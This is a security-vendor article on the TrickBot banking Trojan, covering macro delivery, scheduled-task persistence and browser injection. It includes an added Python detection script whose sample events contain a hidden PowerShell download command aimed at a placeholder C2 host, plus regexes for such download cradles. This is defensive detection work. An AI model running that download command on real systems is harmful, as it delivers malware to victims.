Article
09-01-2017

TrickBot, a Reincarnation of “The” Dyre

The new malware bot TrickBot looks as if Dyre had been brought back to life: TrickBot has a great deal in common with the infamous Dyre banking Trojan.

In 2014, the Dyre malware caused havoc in banking systems all over the world, stealing online banking information via spam emails tailored to look like legitimate bank notifications. Just like Dyre, TrickBot uses the same method of operation: spam emails.

TrickBot targets banking information via emails carrying malicious attachments. When a user opens the .doc attachment, an image disguised as the login page of a well-known bank appears, as shown in Figure 1.

[Figure 1] TrickBot malware disguised as a bank login page

Behind that image, however, the attachment contains a macro that, once activated, uses PowerShell to download TrickBot from the C&C server.

TrickBot was first discovered in October 2016. It is designed to steal financial information from infected systems and has been steadily distributed via spam emails and vulnerable websites. The name comes from the mutex name within the code, Global\\TrickBot; the recently discovered TrickBot, however, uses a different mutex name, VLock.

TrickBot operates by copying itself to a specific path on the infected system and registering itself as a task in the Windows Task Scheduler so that the process is automatically re-executed. The resources of the TrickBot binary contain an encrypted module that is loaded into the computer's memory and executed when TrickBot runs. This in-memory module collects information about the infected system, such as the computer name and operating system type, and generates an ID that serves as the unique identifier of the infected system.
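Both the delivery step described above (a document macro launching PowerShell to fetch the payload) and the persistence step (a scheduled task that re-launches the copied binary) leave traces in ordinary endpoint telemetry. The following Python script is an added example written for this page, not AhnLab's code and not part of the original article. It runs two detection checks over a handful of constructed events shaped after Sysmon process-creation records and Windows scheduled-task-creation records; the paths, task name, user and command line are hypothetical, and the "user-writable directory" heuristic is a general one, not TrickBot's actual install path, which the article does not give.

```python
import ntpath
import re

# Constructed sample events (hypothetical paths, users and command line), shaped
# after Sysmon Event ID 1 (process create) and Windows Security Event ID 4698
# (scheduled task created). Not real telemetry from any incident.
SAMPLE_EVENTS = [
    {"type": "process_create",
     "parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -ep bypass -c \"(New-Object Net.WebClient)"
                     ".DownloadFile('http://c2.example.invalid/a.bin', $env:TEMP + '\\a.exe')\""},
    {"type": "process_create",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -c Get-Date"},
    {"type": "task_create", "task_name": r"\WinUpdateSvc", "user": r"CORP\alice",
     "command": r"C:\Users\alice\AppData\Roaming\WinUpdateSvc\svc.exe"},
    {"type": "task_create", "task_name": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "user": "SYSTEM", "command": r"C:\Windows\System32\defrag.exe"},
]

# Office applications whose child processes deserve scrutiny (macro stage).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Command-line fragments typical of a download cradle.
DOWNLOAD_HINTS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\biex\b|bitstransfer", re.IGNORECASE)
# Fragments used to hide the window or bypass policy; raise severity when present.
HIDE_HINTS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)?\s+bypass|-enc(?:odedcommand)?\b", re.IGNORECASE)
# Directories a non-admin user can write to. A scheduled task that re-launches a
# binary from one of these is the persistence pattern worth reviewing (heuristic;
# the article does not name TrickBot's actual path).
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(users\\[^\\]+\\(appdata|downloads|desktop)|programdata|windows\\temp)\\", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def check_process_create(ev):
    """Flag PowerShell launched by an Office application: the macro-to-downloader step."""
    if basename(ev["parent_image"]) not in OFFICE_APPS or basename(ev["image"]) != "powershell.exe":
        return None
    cmd = ev["command_line"]
    severity = "high" if DOWNLOAD_HINTS.search(cmd) or HIDE_HINTS.search(cmd) else "medium"
    return {"rule": "office_spawned_powershell", "severity": severity,
            "evidence": f"{basename(ev['parent_image'])} -> {cmd}"}


def check_task_create(ev):
    """Flag a new scheduled task whose action runs a binary from a user-writable directory."""
    if not USER_WRITABLE.match(ev["command"]):
        return None
    return {"rule": "task_persists_user_writable_binary", "severity": "high",
            "evidence": f"{ev['task_name']} ({ev['user']}) -> {ev['command']}"}


# Dispatch table: event type -> check function.
CHECKS = {"process_create": check_process_create, "task_create": check_task_create}


def triage(events):
    """Run the applicable check on every event and return the list of findings."""
    findings = []
    for ev in events:
        check = CHECKS.get(ev["type"])
        hit = check(ev) if check else None
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['rule']}: {f['evidence']}")
```

Run as-is, the script reports one high-severity finding for the Word-spawned PowerShell download and one for the task that re-executes a binary from the user's AppData, and stays silent on the two benign events. In a real deployment the same two checks would be fed from Sysmon Event ID 1 and Security Event ID 4698 streams instead of the inline list, and the severity of the process check can be tuned by extending the two regexes.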

TrickBot then generates a URL string based on this unique identifier and attempts to contact the C&C server. Using the information it collected from the system, TrickBot injects itself into the web browser to intercept online banking information.

AhnLab’s major solutions provide proactive measures against malware that is distributed via spam emails, such as TrickBot. AhnLab’s Advanced Persistent Threat (APT) protection solution, AhnLab MDS, counters such malware attacks by employing Mail Transfer Agent (MTA) mode. In this mode, AhnLab MDS detects, analyzes, and quarantines potentially malicious emails, thereby responding effectively not only to advanced spear-phishing email attacks, but also to email-based ransomware.

To learn more about AhnLab MDS, please visit ahnlab.com.

The relevant aliases identified by AhnLab’s security solutions are as below:

<Aliases identified by AhnLab V3>
W97M/Downloader
Trojan/Win32.Trickbot
Trojan/Win32.ZBot

<Alias identified by AhnLab MDS>
Malware/MDP.Execute
